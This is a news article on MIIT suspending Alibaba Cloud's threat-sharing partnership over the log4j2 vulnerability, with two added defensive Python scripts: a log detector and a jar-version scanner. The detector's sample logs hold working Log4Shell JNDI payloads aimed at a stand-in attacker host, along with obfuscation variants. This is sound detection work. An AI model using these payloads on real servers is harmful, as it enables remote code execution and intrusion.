Recently, an all-media reporter of Nanfang Finance and Economics exclusively learned that the Network Security Administration of the Ministry of Industry and Information Technology (MIIT) has announced that Alibaba Cloud Computing Co., Ltd. (hereinafter "Alibaba Cloud"), a partner unit of the MIIT Network Security Threat Information Sharing Platform, failed to report to the competent telecommunications authority in a timely manner after discovering a serious security vulnerability in the Apache log4j2 component, and so failed to effectively support MIIT in carrying out network security threat and vulnerability management. After review, Alibaba Cloud's status as a partner unit has been suspended for six months. When the suspension expires, MIIT will decide whether to reinstate Alibaba Cloud as a partner unit based on its rectification.
In interviews with reporters, many experts in the field of network security said that this Apache log4j2 vulnerability is a typical general-purpose vulnerability. As one of the most commonly used Java logging components, log4j2 is used in a variety of derivative frameworks and is one of the basic components of the whole Java ecosystem. Once such a component fails, the impact is destructive.
Triggered a global computer security crisis
In 2001, software developer Ceki Gülcü designed log4j, a logging library for Java, which soon joined the Apache Software Foundation, a non-profit organization dedicated to open source software projects. In subsequent iterations, Apache launched the new open source project log4j2 on the basis of log4j. While retaining the original features, it added functions such as control of the output destination and output format, and the definition of the log message level. Because it was simple, convenient and powerful, it was soon widely used as a basic integrated module in all kinds of open source Java systems.
However, precisely because log4j2 is so widely applicable, the disclosure of a remote code execution vulnerability in it triggered a huge security crisis across the global computer field.
Recently, Google's open source team scanned Maven Central, the most important repository of Java packages, and found that 35,863 packages depend on a version of the Apache log4j library affected by the vulnerability. Google reported that the affected Java packages account for 8% of Maven Central. Given how widely the repository is used, the vulnerability will have a great impact on the ecosystem of the whole industry. A technician at a Beijing network security company told reporters that perhaps 80 to 90 percent of Java-related development may be affected by the vulnerability.
Fang Ning, senior vice president of Bangbang Security, said in an interview with the 21st Century Business Herald that background logging is a module that most systems have. As a classic piece of open source software, log4j2 is integrated directly into the code when programs are written, and that new software may in turn be integrated into other systems. After repeated layering and nesting, once a security problem occurs in log4j2, the open source software and systems along the whole program chain are affected, so the scope of impact is very wide.
Beyond log4j2's wide range of application, another feature of this vulnerability is that it is very simple to exploit. According to experts, the attacker only needs to send a single piece of crafted input to the target, with no further action required from the user, to trigger the vulnerability and gain remote control of the victim's server; more than 90% of application platforms developed on Java will be affected.
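As an added illustration (not code from the original report or from any of the experts quoted), the following Python script shows what that "single piece of input" looks like in practice and how a defender can spot it in ordinary web-server logs: the payload is a `${jndi:...}` lookup string that log4j2 resolves when it logs the value, and attackers routinely hide it behind URL-encoding and nested lookups such as `${lower:j}` or `${::-j}`. The log lines below are constructed samples, and the IP addresses are documentation ranges; the scheme list and the normalization rules are assumptions about the obfuscations worth undoing, not an exhaustive signature.

```python
import re
import urllib.parse

# Constructed sample access-log lines (combined log format): one benign request,
# a plain JNDI probe in the User-Agent, a URL-encoded probe in the query string,
# an obfuscated probe using nested lower:/default-value lookups, and a benign
# request that merely contains the word "jndi". These are not real captured logs.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:12:00:02 +0800] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.8 - - [10/Dec/2021:12:00:03 +0800] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.64.1"
203.0.113.9 - - [10/Dec/2021:12:00:04 +0800] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${::-l}dap://198.51.100.9/a}"
203.0.113.10 - - [10/Dec/2021:12:00:05 +0800] "GET /search?q=jndi+lookup HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} resolve to x; log4j2 matches the lookup prefix
# case-insensitively, so lower-casing the result is enough for detection.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x} resolves to the default value x when the lookup is unknown or
# empty (e.g. ${::-j}, ${env:NOPE:-j}); braces are excluded from the body so
# the innermost lookup is resolved first and outer ones on later rounds.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The resolved form we are looking for: ${jndi:<scheme>:...}
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corbaname|nds|https?)\s*:",
    re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL-encoding and resolve nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_log4shell(log_text=SAMPLE_LOG):
    """Return (line_number, normalized_payload) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        normalized = normalize(line)
        match = JNDI_PATTERN.search(normalized)
        if not match:
            continue
        end = normalized.find("}", match.start())
        payload = normalized[match.start(): end + 1 if end != -1 else len(normalized)]
        hits.append((number, payload))
    return hits


if __name__ == "__main__":
    for number, payload in find_log4shell():
        print(f"line {number}: {payload}")
```

Running the script flags lines 2, 3 and 4 and prints the de-obfuscated `${jndi:ldap://...}` payload for each, while the benign request that only mentions "jndi" in its query string is left alone. Matching on the raw line would miss lines 3 and 4, which is why the normalization step comes first.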
According to monitoring data from Qi An Xin Technology Group's cloud protection for security domains, nearly 10,000 attacks exploiting this vulnerability had been detected as of noon on December 10. Qi An Xin's emergency response center had received more than ten vulnerability emergency response requests from important units, and reported the vulnerability information to the relevant competent departments on December 9. According to the person in charge of the Butian vulnerability response platform, more than 100 reports about the vulnerability submitted by white-hat hackers were received in just one hour late on December 9.
Ransomware, already rampant, launched a new round of large-scale attacks, taking advantage of the window before major enterprises had patched the log4j2 vulnerability. Researchers from the KnownSec 404 team and the Sangfor Technologies threat intelligence team reported that ransomware such as TellYouThePass and Khonsari is exploiting this vulnerability to attack Linux and Windows systems and install itself directly on user hosts.
Report vulnerabilities to
According to the network security risk tip on the major security vulnerability in the Apache log4j2 component, published by MIIT on its official website on December 17, on December 9, 2021 the MIIT Network Security Threat and Vulnerability Information Sharing Platform received a report from relevant network security professional institutions that the Apache log4j2 component had a serious security vulnerability. MIIT immediately organized relevant network security professional institutions to analyze the vulnerability risk, convened Alibaba Cloud, network security enterprises and professional institutions for assessment, reported the matter to the Apache Software Foundation and urged it to repair the vulnerability in time, and issued a risk early warning to units in the industry.
The tip also points out that the vulnerability may allow remote control of equipment, leading to serious harm such as theft of sensitive information and interruption of service, and is therefore a high-risk vulnerability. To reduce network security risk, relevant units and the public are reminded to pay close attention to the release of patches for the Apache log4j2 component, to check their own systems for use of the component, and to upgrade it in a timely manner.
Prior to this, China had already set out specific requirements for how network vulnerabilities are to be handled and reported. Article 25 of the Cybersecurity Law stipulates: "Network operators shall formulate emergency plans for network security incidents and promptly handle security risks such as system vulnerabilities, computer viruses, network attacks and network intrusions; when an incident endangering network security occurs, they shall immediately activate the emergency plan, take corresponding remedial measures, and report to the relevant competent departments in accordance with the regulations."
In July this year, MIIT, the Cyberspace Administration of China and the Ministry of Public Security jointly issued the Regulations on the Management of Security Vulnerabilities in Network Products, which set out more detailed requirements on the responsibilities and obligations of network product providers, network operators and vulnerability information sharing platforms. Article 7 stipulates that after discovering or learning of a security vulnerability in a network product it provides, the provider shall immediately take measures and organize verification, assess the degree and scope of harm, and submit the relevant vulnerability information to the MIIT Network Security Threat and Vulnerability Information Sharing Platform within 2 days; for security vulnerabilities in its upstream products or components, it shall immediately notify the relevant product providers; and where product users (including downstream manufacturers) need to take measures such as software or firmware upgrades, it shall inform them in a timely manner and provide the necessary technical support.
On the platform side, the MIIT Network Security Threat and Vulnerability Information Sharing Platform synchronously notifies the National Network and Information Security Information Notification Center and the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC) of the relevant vulnerability information.
According to Fang Ning, China's national vulnerability collection and sharing platforms currently include CNVD (the National Information Security Vulnerability Sharing Platform) and CNNVD (the National Information Security Vulnerability Database), among others. Such platforms typically enlist a large number of third-party security enterprises to feed them network security vulnerabilities on an ongoing basis. As support units of the relevant departments, these third-party enterprises are required by the regulations to submit the vulnerabilities they discover to the national collection platforms in a timely manner.
The impact is expected to continue
At present, the number of enterprises and organizations affected and threatened by the log4j2 vulnerability is still growing. According to statistics from the Huoxian Apache log4j2 vulnerability impact query site, as of press time the vulnerability had affected more than 60,000 open source software projects, involving more than 320,000 affected package versions.
In addition to enterprises, some government agencies and social organizations have become targets of hackers because they did not patch the log4j2 vulnerability in time. It was reported that on December 16 local time, the Belgian Ministry of Defence was attacked by hackers exploiting the vulnerability. The Belgian Minister of Defence responded that his security team is working to ensure network security and prevent similar incidents from happening again.
Although Apache officially released the log4j2 security update on December 8, its impact is expected to persist for a long time.
"It may take at least six months to reduce the impact of this vulnerability to a relatively small range." Fang Ning explained that when such 0day vulnerabilities (vulnerabilities that have been discovered but not yet patched) first come to light, they are usually fixed first by enterprises that pay more attention to security and have the corresponding financial and human resources, while large numbers of small and medium-sized enterprises without dedicated network security departments and teams may not even learn of the situation.
The technical director of a data company in Guangzhou told reporters that as large numbers of small and medium-sized enterprises increasingly rely on basic technical services provided by cloud service providers, those providers are obliged to take on more social responsibility for early warning and security.
Fang Ning said that major security vendors have already provided automatic detection tools and scripts. What matters most now is that enterprises and relevant units take the issue seriously and check their own product systems against the solutions given by the national vulnerability database and vulnerability platforms. The Beijing network security technician quoted above said that many developers can avoid attack by upgrading the software version in time. "The most critical thing is to do a good job of self-examination and upgrading."
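As an added example of the self-examination step, and not a tool from Fang Ning or from any vendor named above, the following Python script inventories copies of log4j-core on disk the way the published detection scripts do: it reads the Maven version recorded inside each jar, descends into nested archives (WAR, EAR, fat jars) where bundled copies hide from a plain file listing, and also checks whether the JndiLookup.class removal mitigation has been applied. The jars it scans are constructed fixtures it builds itself in a temporary directory; the version thresholds (fix in 2.15.0, backports in 2.12.2 and 2.3.1, 1.x unaffected by this particular CVE) follow the Apache advisory for CVE-2021-44228, and the status labels are this example's own.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Entry removed by the widely published mitigation
# (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven writes the artifact version here inside every log4j-core jar.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not match:
        return None
    return tuple(int(part or 0) for part in match.groups())


def is_vulnerable_version(version):
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1. The fix shipped in
    2.15.0, with backports in 2.12.2 (Java 7) and 2.3.1 (Java 6). 1.x is not affected
    by this CVE (it is end-of-life and has separate issues of its own)."""
    if version is None or version[0] != 2:
        return False
    if version >= (2, 15, 0):
        return False
    if (2, 12, 2) <= version < (2, 13, 0) or (2, 3, 1) <= version < (2, 4, 0):
        return False
    return True


def scan_archive(data, label, findings):
    """Inspect one zip archive held in memory, then descend into any archives nested
    inside it (fat jars, WAR WEB-INF/lib, EAR modules) so a bundled copy is not missed."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with archive:
        names = set(archive.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in archive.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi_lookup = JNDI_LOOKUP_CLASS in names
        if version is not None or has_jndi_lookup:
            parsed = parse_version(version)
            if parsed is None:
                status = "REVIEW (JndiLookup present, log4j-core version unknown)"
            elif is_vulnerable_version(parsed):
                status = "VULNERABLE" if has_jndi_lookup else "MITIGATED (JndiLookup.class removed)"
            else:
                status = "OK"
            findings.append({"path": label, "version": version,
                             "jndi_lookup": has_jndi_lookup, "status": status})
        for name in sorted(names):
            if name.lower().endswith(NESTED_ARCHIVE_SUFFIXES):
                scan_archive(archive.read(name), f"{label}!{name}", findings)


def scan_tree(root):
    """Walk a directory and scan every archive found; returns a list of findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in NESTED_ARCHIVE_SUFFIXES:
            scan_archive(path.read_bytes(), str(path.relative_to(root)), findings)
    return findings


def build_sample(root):
    """Constructed fixture, not real artifacts: minimal jars carrying only the Maven
    pom.properties and (optionally) a stand-in JndiLookup.class entry."""
    def make_log4j_core(version, with_jndi=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as jar:
            jar.writestr(POM_PROPERTIES,
                         f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()

    root = Path(root)
    with zipfile.ZipFile(root / "app.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_log4j_core("2.14.1"))
    (root / "log4j-core-2.17.1.jar").write_bytes(make_log4j_core("2.17.1"))
    (root / "log4j-core-2.14.1-stripped.jar").write_bytes(make_log4j_core("2.14.1", with_jndi=False))


def demo():
    """Build the fixture in a temporary directory and return {path: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return {f["path"]: f["status"] for f in scan_tree(tmp)}


if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:45} {path}")
```

To use it on a real host, call `scan_tree("/opt")` (or the application root) instead of `demo()`; the important design choice is that archives are read as bytes and recursed, because the vulnerable copy is frequently the one inside `WEB-INF/lib` of a deployed WAR rather than a loose jar that a filename search would find. The check covers CVE-2021-44228 as the article describes it; the follow-up advisories raised the recommended floor to later 2.17.x releases, so treat a version that passes here but is below the current release as still needing an upgrade.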
(21st Century Business Herald)